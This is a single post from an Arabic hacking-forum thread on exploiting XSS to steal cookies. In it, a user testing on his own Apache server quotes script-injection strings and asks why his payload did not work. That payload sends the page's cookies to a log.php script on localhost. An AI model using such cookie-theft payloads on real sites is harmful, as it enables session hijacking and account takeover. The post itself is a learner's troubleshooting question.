عرض مشاركة واحدة
قديم 08-21-2011, 11:30 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
mass1993
 
الصورة الرمزية mass1993
 

 

 
إحصائية العضو






mass1993 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mass1993 is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

التعديل الأخير تم بواسطة mass1993 ; 08-21-2011 الساعة 11:35 PM.

   

رد مع اقتباس